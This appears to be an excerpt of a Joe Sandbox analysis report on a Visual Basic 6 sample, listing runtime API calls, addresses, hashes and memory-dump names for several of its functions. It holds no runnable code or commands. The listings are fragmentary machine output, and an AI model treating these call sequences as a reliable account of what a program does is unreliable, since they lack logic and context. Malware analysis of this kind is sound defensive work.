                                                                                                                                                                                  • Opcode Fuzzy Hash: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD9141B5E00208DBCB08DFB5DD89ADDBBBAEB88341F14453AE505F72A0DB345985CB94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004093D0,00000000), ref: 0041079E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004107CE
                                                                                                                                                                                  • __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004107DF
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004107EE
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041080A
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410844
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041085A
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410873
                                                                                                                                                                                  • #525.MSVBVM60(00000104), ref: 0041089C
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004108A7
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004108DE
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041091D
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410938
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041095E
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041096F
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410984
                                                                                                                                                                                  • #616.MSVBVM60(?,?,?,00000000), ref: 00410999
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109A7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004109BE
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000), ref: 004109CA
                                                                                                                                                                                  • #517.MSVBVM60(?,?,00000000), ref: 004109DB
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004109E9
                                                                                                                                                                                  • #517.MSVBVM60(?,00000000,?,00000000), ref: 004109F7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 00410A05
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00410A0C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410A30
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410A77
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00410A8D
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410AA6
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?), ref: 00410ACA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00410B37), ref: 00410B03
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410B1B
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410B24
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00410B30
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3648932012-0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040C71E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040C74E
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C7A1
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040563C,0000001C), ref: 0040C7E9
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0040C80D
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C81A
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$Free$ChkstkError
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1728155253-0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                  • #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                  • #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                  • #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                  • #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                  • #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?), ref: 0040F18B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$#516#631$#537BstrCopyErrorOverflow
                                                                                                                                                                                  • String ID: VUUU$VUUU$gfff
                                                                                                                                                                                  • API String ID: 3310697333-2314002932
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001,00000000,660CC33A,6600A3D7), ref: 00416456
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 00416487
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 0041649F
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164C4
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164D9
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 004164F4
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00416513
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00416527
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416547
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416567
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 00416595
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 0041659E
                                                                                                                                                                                  • __vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004165B8
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 004165C0
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004165F6
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416606
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416622
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416632
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416665
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416675
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166BD
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166CD
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166F3
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416703
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416729
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416739
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416755
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416762
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 0041678D
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004167B5), ref: 004167AE
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 004167CB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234381736-0
                                                                                                                                                                                  • Opcode ID: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                                                  • Instruction ID: f2618860313800eaedd81b2e61ad480ccb106d02fda6e258e19164c82fe6daf4
                                                                                                                                                                                  • Opcode Fuzzy Hash: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01C15D719002199BCF14DFA8CA80AEEB7B5FF48304F61459AD419B7280D775ED82CFA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E85E
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E8A3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8B8
                                                                                                                                                                                  • #712.MSVBVM60(?,file:///,00406674,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E8D9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8E4
                                                                                                                                                                                  • #712.MSVBVM60(?,00407218,004055FC,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E905
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E910
                                                                                                                                                                                  • #572.MSVBVM60(00004002), ref: 0040E969
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E974
                                                                                                                                                                                  • #537.MSVBVM60(00000020), ref: 0040E97F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E98A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 0040E9B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(00407220,00000000), ref: 0040E9C8
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 0040E9CF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E9DA
                                                                                                                                                                                  • #712.MSVBVM60(?,00000000), ref: 0040E9E5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E9F0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0040EA0C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040EA2E
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040EA78), ref: 0040EA71
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040EAA2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
                                                                                                                                                                                  • String ID: $file:///
                                                                                                                                                                                  • API String ID: 1913684286-1087255347
                                                                                                                                                                                  • Opcode ID: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                                                  • Instruction ID: 6c3c390ee14800d438280c46509e4d6c9a5a921f8fc3fa6165506003015d033a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6551FA71900208EBDB04DFE4DE48BDEBBB4FF08714F208229E612BB2A4DB755A45CB54
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040C8EF
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C94E
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?), ref: 0040C984
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040563C,00000020), ref: 0040C9C8
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 0040C9FB
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040CC42
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 435708370-0
                                                                                                                                                                                  • Opcode ID: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                                                  • Instruction ID: a4ec598c1f86ad3a10f33067e1d5db8d23c0cfab8629dd77bc108e4b9737f716
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
                                                                                                                                                                                  • Instruction Fuzzy Hash: EDE11775900208EFDB14DFA4C988ADEBBB5FF48700F208269F509B7291D7759985CF64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418E00
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
                                                                                                                                                                                  • String ID: `%@
                                                                                                                                                                                  • API String ID: 653519621-700023621
                                                                                                                                                                                  • Opcode ID: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                                                  • Instruction ID: 012eab173ab8f044d01c72bc6db05120050b8ff049b8a372a5089938a40e6a64
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41DA76900209EBCB04EFE4DE59EDEBB78FB48305F108519F216B71A0DB75AA44CB64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,00000000,004025E6), ref: 004123DE
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0041240B
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041241A
                                                                                                                                                                                  • #648.MSVBVM60(0000000A), ref: 00412439
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00412448
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60(?), ref: 0041245C
                                                                                                                                                                                  • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041246A
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 0041247A
                                                                                                                                                                                  • #570.MSVBVM60(00000000), ref: 00412481
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 0041248E
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(00404B24), ref: 004124C1
                                                                                                                                                                                  • #525.MSVBVM60(00000000), ref: 004124C8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004124D3
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004124E3
                                                                                                                                                                                  • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004124EE
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 004124FE
                                                                                                                                                                                  • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041250B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
